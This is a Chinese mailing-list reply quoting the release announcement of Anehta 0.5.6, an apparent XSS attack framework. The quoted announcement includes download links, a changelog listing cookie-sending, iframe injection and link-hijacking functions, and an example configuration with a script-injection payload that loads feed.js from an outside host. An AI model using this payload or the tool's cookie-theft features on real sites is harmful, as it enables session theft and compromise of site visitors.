测试下可能的话做个GI On 11月3日, 下午1时31分, 大风 <[EMAIL PROTECTED]> wrote: > 我很开心的宣布,Anehta 0.5.6 发布了! > > 下载地址为:http://anehta.googlecode.com/files/anehta-v0.5.6.zip > > http://anehta.googlecode.com/files/anehta-v0.5.6-withoutQQWry.zip > > 镜像下载为:http://www.nukeblog.cn/anehta/anehta-v0.5.6-withoutQQWry.rar > > (感谢nuke提供镜像) > > 这次作出了许多改进,以及修复了许多bug。 > > 主要changelog如下: > > Bug Fix: > 修正了slave/index.php中设置header的一处bug > 修正了glype 中自定义cookie时找不到当前路径导致提交失败的bug > 修复了admin.php和/slave/index.php中时区显示不正确的bug > 修复了当水印为null时有时候会读取出错的bug > fix其他一些小bug > > 功能调整: > base.js改名为 anehta.js > anehta.js 不再依赖于jQuery,可以单独加载 > 扫描签名移到scanner.js中,可选择性加载 > 修改了clx模块中取cookie的方式,改变成每次访问都发送cookie > 将anehta.logger.logCache()移动到了更重要的clx.js中,保证该函数的运行 > 修改了anehta.inject.injectFlash,加强了兼容性和健壮性 > 修改了 anehta.inject.injectIframe, 增加了注入iframe的id 和 name属性 > 改变了logCache()函数的方法,从GET改成POST,支持提交大数据 > 修改了logCache()函数提交的数据,改变为每次只提交cache中变更的数据 > 后台realtimecmd提交采用base64编码,以绕过magic_quotes对特殊字符的转义。 > 发送邮件后从只删除log.txt变为删除整个目录 > 增加了safe_php库,修补了个别后台的XSS漏洞 > 调整了文件的目录,主要php文件都集中放到了server文件夹中 > > New Feature: > 新增以下函数: > anehta.inject.addIframe(); > anehta.inject.injectCSS(); > anehta.net.cssGet(); > anehta.net.postFormIntoIframe(); > anehta.detect.screenSize(); > anehta.trick.hijackLink(); > anehta.misc.getCurrentPage(); > 新增了检测浏览器类型的方法,增加对浏览器指纹的判断,防止了userAgent伪造 > 统一了anehta.js中函数的命名规则:统一为,第一个单词小写,之后每个单词均大写开 > 头字母:比如getCurrentPage(); > 新增了help 模块,可以直接调用 anehta.help(); 查看API手册 > 新增一个配置脚本: /server/config.php ,可以通过该页面修改配置(admin.php默认 > 集成了此页面) > > 关于使用: > 下载后,只需要解压缩所有文件到某个目录就可以了 > > 使用前先访问http://xxxxx/anehta > > 会自动跳转到http://xxxxx/anehta/server/admin.php > > 此次新增了对anehta的配置选项: > > 目前暂时不支持对mail.php 的配置,以后会加上,需要配置邮件的朋友,请手动打开 > server/mail.php 进行配置。 > > 在上面的配置中,修改 anehtaurl 后会自动配置到所有JS文件中,以上三个配置都需 > 要写,不然无法生成正确的JS文件。 > > 一个典型的配置如下: > anehtaurl:http://www.a.com/anehta > > boomerangtarget:http://www.alimafia.com/xssDemo.html#'><script > src=http://www.secwiki.com/anehta/branches/1/feed.js></script><' > > boomerangsrc:http://www.a.com/anehta/demo.html > > 修改成功后会显示上面三个设置的值,如果没修改成功,请再提交一次表单 > > 如果要使用demo.html,请记得修改demo.html中的XSS引入feed.js的地址。 > > [Ph4nt0m] <http://www.ph4nt0m.org/> > > [Ph4nt0m Security Team] > > <http://blog.ph4nt0m.org/> [EMAIL PROTECTED] > > Email: [EMAIL PROTECTED] > > PingMe: > <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han... > hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724> > > === V3ry G00d, V3ry Str0ng === > > === Ultim4te H4cking === > > === XPLOITZ ! === > > === #_# === > > #If you brave,there is nothing you cannot achieve.# > > image001.jpg > 37K查看下载 > > image002.gif > 5K查看下载 --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---

